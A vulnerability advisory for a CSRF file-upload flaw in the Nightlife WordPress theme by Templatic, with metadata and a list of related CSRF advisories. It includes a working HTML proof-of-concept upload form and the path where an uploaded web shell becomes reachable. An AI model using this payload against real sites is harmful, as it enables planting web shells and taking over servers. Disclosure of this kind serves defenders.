Nightlife by Templatic – CSRF File Upload | Theme Vulnerabilities

Description

The nightlife WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability.

Proof of Concept

<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="https://example.com/wp-content/themes/nightlife/Monetize/general/upload-file.php">
<input name="uploadfile[]" type="file" />
<input type="submit" value="upload" />
</form>
</center>
</body>
</html>

File Access: https://example.com/wp-content/themes/nightlife/images/tmp/your_shell.php

Affects Themes

No known fix

References

URL

https://en.0day.today/exploits/22091

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Jje Incovers

Verified

No

WPVDB ID

3bc41490-d6fd-4b77-8d16-ef12bc92e377

Timeline

Publicly Published

2014-08-01 (about 11 years ago)

Added

2014-08-01 (about 11 years ago)

Last Updated

2021-01-13 (about 5 years ago)

Other

Published

Title

Published

2021-03-01

Title

WP Private Content Plus < 3.2 - Cross-Site Request Forgery

Published

2023-05-24

Title

Drag and Drop Multiple File Upload – Contact Form 7 < 1.3.6.6 - File Upload and File deletion via CSRF

Published

2025-06-19

Title

ClipLink <= 1.1 - Cross-Site Request Forgery

Published

2024-04-09

Title

No-Bot Registration < 2.0 - Cross-Site Request Forgery

Published

2023-05-30

Title

Feather Login Page < 1.1.2 - Cross-Site Request Forgery to Privilege Escalation